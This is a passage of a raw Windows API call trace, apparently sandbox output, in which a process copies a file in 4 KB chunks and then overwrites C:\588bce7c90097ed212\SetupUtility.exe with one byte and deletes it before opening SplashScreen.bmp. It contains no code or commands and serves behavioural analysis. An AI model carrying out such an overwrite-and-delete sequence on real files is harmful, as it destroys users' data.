nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.950] GetLastError () returned 0x0 [0080.950] SetLastError (dwErrCode=0x0) [0080.950] GetLastError () returned 0x0 [0080.950] SetLastError (dwErrCode=0x0) [0080.950] GetLastError () returned 0x0 [0080.950] SetLastError (dwErrCode=0x0) [0080.950] GetLastError () returned 0x0 [0080.950] SetLastError (dwErrCode=0x0) [0080.950] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.951] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.951] GetLastError () returned 0x0 [0080.951] SetLastError (dwErrCode=0x0) [0080.951] GetLastError () returned 0x0 [0080.951] SetLastError (dwErrCode=0x0) [0080.951] GetLastError () returned 0x0 [0080.951] SetLastError (dwErrCode=0x0) [0080.951] GetLastError () returned 0x0 [0080.951] SetLastError (dwErrCode=0x0) [0080.951] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.951] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.952] GetLastError () returned 0x0 [0080.952] SetLastError (dwErrCode=0x0) [0080.952] GetLastError () returned 0x0 [0080.952] SetLastError (dwErrCode=0x0) [0080.952] GetLastError () returned 0x0 [0080.952] SetLastError (dwErrCode=0x0) [0080.952] GetLastError () returned 0x0 [0080.952] SetLastError (dwErrCode=0x0) [0080.952] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.952] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.952] GetLastError () returned 0x0 [0080.953] SetLastError (dwErrCode=0x0) [0080.953] GetLastError () returned 0x0 [0080.953] SetLastError (dwErrCode=0x0) [0080.953] GetLastError () returned 0x0 [0080.953] SetLastError (dwErrCode=0x0) [0080.953] GetLastError () returned 0x0 [0080.953] SetLastError (dwErrCode=0x0) [0080.953] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.953] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.953] GetLastError () returned 0x0 [0080.953] SetLastError (dwErrCode=0x0) [0080.953] GetLastError () returned 0x0 [0080.953] SetLastError (dwErrCode=0x0) [0080.954] GetLastError () returned 0x0 [0080.954] SetLastError (dwErrCode=0x0) [0080.954] GetLastError () returned 0x0 [0080.954] SetLastError (dwErrCode=0x0) [0080.954] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.954] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.954] GetLastError () returned 0x0 [0080.954] SetLastError (dwErrCode=0x0) [0080.954] GetLastError () returned 0x0 [0080.954] SetLastError (dwErrCode=0x0) [0080.954] GetLastError () returned 0x0 [0080.954] SetLastError (dwErrCode=0x0) [0080.955] GetLastError () returned 0x0 [0080.955] SetLastError (dwErrCode=0x0) [0080.955] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.955] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.955] GetLastError () returned 0x0 [0080.955] SetLastError (dwErrCode=0x0) [0080.955] GetLastError () returned 0x0 [0080.955] SetLastError (dwErrCode=0x0) [0080.955] GetLastError () returned 0x0 [0080.955] SetLastError (dwErrCode=0x0) [0080.955] GetLastError () returned 0x0 [0080.955] SetLastError (dwErrCode=0x0) [0080.956] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.956] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.956] GetLastError () returned 0x0 [0080.956] SetLastError (dwErrCode=0x0) [0080.956] GetLastError () returned 0x0 [0080.956] SetLastError (dwErrCode=0x0) [0080.956] GetLastError () returned 0x0 [0080.956] SetLastError (dwErrCode=0x0) [0080.956] GetLastError () returned 0x0 [0080.956] SetLastError (dwErrCode=0x0) [0080.956] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.957] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.957] GetLastError () returned 0x0 [0080.957] SetLastError (dwErrCode=0x0) [0080.957] GetLastError () returned 0x0 [0080.957] SetLastError (dwErrCode=0x0) [0080.957] GetLastError () returned 0x0 [0080.957] SetLastError (dwErrCode=0x0) [0080.957] GetLastError () returned 0x0 [0080.957] SetLastError (dwErrCode=0x0) [0080.957] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.957] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.958] GetLastError () returned 0x0 [0080.958] SetLastError (dwErrCode=0x0) [0080.958] GetLastError () returned 0x0 [0080.958] SetLastError (dwErrCode=0x0) [0080.958] GetLastError () returned 0x0 [0080.958] SetLastError (dwErrCode=0x0) [0080.958] GetLastError () returned 0x0 [0080.958] SetLastError (dwErrCode=0x0) [0080.958] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.958] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.959] GetLastError () returned 0x0 [0080.959] SetLastError (dwErrCode=0x0) [0080.959] GetLastError () returned 0x0 [0080.959] SetLastError (dwErrCode=0x0) [0080.959] GetLastError () returned 0x0 [0080.959] SetLastError (dwErrCode=0x0) [0080.959] GetLastError () returned 0x0 [0080.959] SetLastError (dwErrCode=0x0) [0080.959] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.959] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.959] GetLastError () returned 0x0 [0080.959] SetLastError (dwErrCode=0x0) [0080.960] GetLastError () returned 0x0 [0080.960] SetLastError (dwErrCode=0x0) [0080.960] GetLastError () returned 0x0 [0080.960] SetLastError (dwErrCode=0x0) [0080.960] GetLastError () returned 0x0 [0080.960] SetLastError (dwErrCode=0x0) [0080.960] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.960] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.960] GetLastError () returned 0x0 [0080.960] SetLastError (dwErrCode=0x0) [0080.960] GetLastError () returned 0x0 [0080.960] SetLastError (dwErrCode=0x0) [0080.961] GetLastError () returned 0x0 [0080.961] SetLastError (dwErrCode=0x0) [0080.961] GetLastError () returned 0x0 [0080.961] SetLastError (dwErrCode=0x0) [0080.961] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.961] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.961] GetLastError () returned 0x0 [0080.961] SetLastError (dwErrCode=0x0) [0080.961] GetLastError () returned 0x0 [0080.961] SetLastError (dwErrCode=0x0) [0080.961] GetLastError () returned 0x0 [0080.961] SetLastError (dwErrCode=0x0) [0080.962] GetLastError () returned 0x0 [0080.962] SetLastError (dwErrCode=0x0) [0080.962] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.962] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.962] GetLastError () returned 0x0 [0080.962] SetLastError (dwErrCode=0x0) [0081.166] GetLastError () returned 0x0 [0081.166] SetLastError (dwErrCode=0x0) [0081.166] GetLastError () returned 0x0 [0081.172] SetLastError (dwErrCode=0x0) [0081.172] GetLastError () returned 0x0 [0081.172] SetLastError (dwErrCode=0x0) [0081.195] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.196] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.196] GetLastError () returned 0x0 [0081.196] SetLastError (dwErrCode=0x0) [0081.196] GetLastError () returned 0x0 [0081.196] SetLastError (dwErrCode=0x0) [0081.196] GetLastError () returned 0x0 [0081.196] SetLastError (dwErrCode=0x0) [0081.196] GetLastError () returned 0x0 [0081.196] SetLastError (dwErrCode=0x0) [0081.197] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0081.197] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.197] GetLastError () returned 0x0 [0081.197] SetLastError (dwErrCode=0x0) [0081.197] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0081.197] GetLastError () returned 0x0 [0081.197] SetLastError (dwErrCode=0x0) [0081.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0081.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0081.197] GetLastError () returned 0x0 [0081.197] SetLastError (dwErrCode=0x0) [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0081.198] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0081.198] GetLastError () returned 0x0 [0081.198] SetLastError (dwErrCode=0x0) [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0081.198] GetLastError () returned 0x0 [0081.198] SetLastError (dwErrCode=0x0) [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0081.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0081.198] CloseHandle (hObject=0x42c) returned 1 [0081.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.202] CloseHandle (hObject=0x428) returned 1 [0081.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0081.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0081.202] AreFileApisANSI () returned 1 [0081.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d4d0 [0081.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0081.203] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0081.204] GetFileType (hFile=0x428) returned 0x1 [0081.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0081.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.204] GetLastError () returned 0xb7 [0081.204] SetLastError (dwErrCode=0xb7) [0081.204] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0081.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.205] CloseHandle (hObject=0x428) returned 1 [0081.206] AreFileApisANSI () returned 1 [0081.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.206] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cd40 [0081.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 39 [0081.206] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0081.207] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0081.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.207] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.207] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x1, dwReserved1=0x0, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0081.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0081.207] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0081.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0081.208] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0081.208] AreFileApisANSI () returned 1 [0081.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SplashScreen.bmp", lpUsedDefaultChar=0x0) returned 39 [0081.208] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0081.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.208] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0081.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0081.209] AreFileApisANSI () returned 1 [0081.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0081.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6cf50 [0081.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x6cf50, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 39 [0081.209] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, 